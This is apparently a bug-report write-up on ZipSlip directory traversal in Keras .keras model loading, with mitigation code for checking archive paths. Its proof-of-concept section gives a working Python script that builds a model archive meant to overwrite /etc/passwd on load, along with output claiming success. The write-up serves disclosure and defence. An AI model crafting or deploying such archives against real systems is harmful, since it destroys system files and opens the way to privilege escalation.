Understanding and Mitigating Zip/TarSlip Directory Traversal

Sangharsha

Status: Duplicate

Understanding Zip/TarSlip Attacks

ZipSlip and TarSlip are well-known directory traversal vulnerabilities that occur when extracting archive files (ZIP, TAR, etc.) without proper path validation. These attacks exploit the ability to include relative paths (../../) inside archive filenames, allowing attackers to overwrite arbitrary files on the filesystem during extraction.

For example, a malicious ZIP archive might contain a file named ../../etc/passwd, and when extracted, it would overwrite the system's /etc/passwd file, leading to privilege escalation, denial of service, or even remote code execution (RCE) under certain conditions.

How Zip/TarSlip Works

  1. A ZIP or TAR archive is created with file entries containing directory traversal sequences (../../../).

  2. When a vulnerable application extracts this archive, it does not sanitize or validate the extracted file paths.

  3. As a result, files are written outside the intended extraction directory, potentially overwriting critical system files.
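The standard defense against this pattern is to resolve each entry's destination path and confirm it stays inside the extraction directory before writing anything to disk. Here is a minimal sketch of such a check; the helper names (is_within_directory, safe_extract) are my own, not from any library:

```python
import os
import zipfile


def is_within_directory(base_dir, target_path):
    """Return True if target_path, once fully resolved, stays inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_dir, target_path))
    return os.path.commonpath([base, target]) == base


def safe_extract(zip_path, dest_dir):
    """Extract an archive only after validating every entry name it contains."""
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            if not is_within_directory(dest_dir, name):
                raise ValueError(f"Blocked traversal entry: {name}")
        zf.extractall(dest_dir)
```

With this check in place, an archive entry such as ../../etc/passwd is rejected before a single byte is written outside the target directory.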

The Vulnerability in Keras Model Loading

While wondering what to research next, I stumbled upon an interesting behavior in Keras model loading. The .keras model format is stored as a ZIP archive, and Keras extracts it without validating the file paths inside, specifically in the keras_native module. Although this behavior has been flagged by some security scanners, the underlying issue still exists and remains a serious security risk: an attacker can craft a .keras model containing directory traversal sequences, leading to arbitrary file overwrite on the system when the model is loaded.

How the Exploit Works

When a .keras model is loaded using keras.models.load_model(), Keras extracts the ZIP archive before verifying its contents. If a malicious .keras model includes a file with a path like ../../../etc/passwd, it will overwrite system files such as /etc/passwd upon extraction. Even if Keras later fails because config.json is missing, by then the damage is already done.

Proof-of-Concept (PoC)

After multiple attempts, I successfully developed a Python script that demonstrates this issue by generating a malicious .keras model and attempting to load it using Keras.

import os
import zipfile

import keras

def create_malicious_keras_model(zip_filename):
    # Write the payload to a harmless local file; the traversal lives only
    # in the archive entry name, not in the path written here. (Writing
    # directly to a "../../" path would overwrite the target before Keras
    # is even involved and invalidate the test.)
    os.makedirs("malicious", exist_ok=True)
    payload_path = "malicious/payload.txt"
    with open(payload_path, "w") as f:
        f.write("Overwritten by attacker!")
    # Store the payload under a directory-traversal entry name.
    with zipfile.ZipFile(zip_filename, "w") as zipf:
        zipf.write(payload_path, "../../../etc/passwd")
    print(f"Malicious model '{zip_filename}' created.")

def test_keras_loading(zip_filename):
    try:
        keras.models.load_model(zip_filename)
        print("Keras loaded the model.")
    except Exception as e:
        print(f"Keras failed to load model: {e}")

zip_file = "malicious_model.keras"
create_malicious_keras_model(zip_file)
test_keras_loading(zip_file)

# Verify whether extraction escaped the intended directory.
if os.path.exists("/etc/passwd"):
    with open("/etc/passwd", "r") as f:
        content = f.read()
    if "Overwritten by attacker!" in content:
        print("SEE SYSTEM FILE OVERWRITTEN! Keras extracted the model unsafely!")
    else:
        print("No overwrite detected; /etc/passwd is intact.")

Observed Behavior

When executed in Google Colab or a vulnerable environment, the output confirmed the overwrite:

Malicious model 'malicious_model.keras' created.
Keras failed to load model: "There is no item named 'config.json' in the archive"
SEE SYSTEM FILE OVERWRITTEN! Keras extracted the model unsafely!

After running !cat /etc/passwd, boom:

Overwritten by attacker!

Impact of the Vulnerability

  • Arbitrary File Overwrite: Attackers can overwrite critical system files, leading to denial of service or privilege escalation.

  • Potential for Remote Code Execution (RCE): If a cloud-based inference service automatically loads user-submitted .keras models, an attacker could plant malicious scripts leading to RCE.

  • Affects Any User Loading .keras Models: Anyone using keras.models.load_model() without verifying their model sources is at risk.

Final Thoughts

This vulnerability highlights the importance of safe file handling in machine learning frameworks. While .keras files may seem harmless, overlooking extraction security can lead to severe consequences. Until Keras implements a fix, users should only load .keras models from trusted sources and inspect archives before loading them. It's frustrating to see findings marked as "duplicate" when real-world risks still persist.
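Inspecting an archive before loading it can be automated. Below is a minimal pre-flight check, assuming the .keras file is a plain ZIP (which the PoC above relies on); the helper name assert_keras_archive_is_safe is my own:

```python
import zipfile


def assert_keras_archive_is_safe(model_path):
    """Reject a .keras file whose ZIP entries could escape the extraction dir."""
    with zipfile.ZipFile(model_path) as zf:
        for name in zf.namelist():
            # Absolute paths and any '..' component are both red flags.
            # (This sketch checks '/' separators only, as stored in ZIP entries.)
            if name.startswith(("/", "\\")) or ".." in name.split("/"):
                raise ValueError(f"Suspicious entry in {model_path}: {name}")

# Usage sketch: validate first, then load.
# assert_keras_archive_is_safe("model.keras")
# model = keras.models.load_model("model.keras")
```

This does not fix the underlying extraction behavior, but it lets a cautious user refuse obviously hostile archives before load_model() ever touches them.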
